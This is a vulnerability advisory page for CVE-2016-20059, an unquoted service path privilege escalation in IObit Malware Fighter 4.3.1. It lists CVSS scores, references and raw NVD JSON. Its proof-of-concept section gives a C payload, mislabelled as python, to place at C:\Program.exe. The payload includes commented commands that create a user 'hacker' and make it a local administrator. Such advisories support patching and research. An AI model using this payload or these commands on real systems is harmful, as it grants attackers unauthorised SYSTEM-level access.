CVE-2016-20059

Description

IObit Malware Fighter 4.3.1 contains an unquoted service path vulnerability in the IMFservice and LiveUpdateSvc services that allows local attackers to escalate privileges. Attackers can insert a malicious executable file in the unquoted service path and trigger privilege escalation when the service restarts or the system reboots, executing code with LocalSystem privileges.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:iobit:malware_fighter:*:*:*:*:free:*:*:* - VULNERABLE

IObit Malware Fighter 4.3.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#include <windows.h>

// This is a proof of concept payload for CVE-2016-20059
// Compile this and place it as C:\Program.exe (or other vulnerable path segments)
// When the service restarts, this code will execute with SYSTEM privileges.

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
    // Malicious code execution here
    // For demonstration, we just launch a message box or create a user
    
    // Example: Add a new user to the system (requires SYSTEM privs)
    // system("net user hacker P@ssw0rd /add");
    // system("net localgroup administrators hacker /add");
    
    MessageBox(NULL, "CVE-2016-20059 Exploit Executed with SYSTEM Privileges", "PoC", MB_OK);
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2016-20059
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2016-20059
[3] CVE Details https://www.cvedetails.com/cve/CVE-2016-20059/
[4] VulDB https://vuldb.com/cve/CVE-2016-20059
[5] http://www.iobit.com/downloadcenter.php?product=malware-fighter-free
[6] http://www.iobit.com/en/index.php
[7] https://www.exploit-db.com/exploits/40525
[8] https://www.vulncheck.com/advisories/iobit-malware-fighter-unquoted-service-path-privilege-escalation

Raw JSON Data

JSON

{"cve": {"id": "CVE-2016-20059", "sourceIdentifier": "[email protected]", "published": "2026-04-04T14:16:18.557", "lastModified": "2026-04-27T13:27:25.357", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IObit Malware Fighter 4.3.1 contains an unquoted service path vulnerability in the IMFservice and LiveUpdateSvc services that allows local attackers to escalate privileges. Attackers can insert a malicious executable file in the unquoted service path and trigger privilege escalation when the service restarts or the system reboots, executing code with LocalSystem privileges."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:iobit:malware_fighter:*:*:*:*:free:*:*:*", "versionEndIncluding": "4.3.1", "matchCriteriaId": "93087180-C98A-458D-9F2A-F3E46DE54B82"}]}]}], "references": [{"url": "http://www.iobit.com/downloadcenter.php?product=malware-fighter-free", "source": "[email protected]", "tags": ["Product"]}, {"url": "http://www.iobit.com/en/index.php", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/40525", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/iobit-malware-fighter-unquoted-service-path-privilege-escalation", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}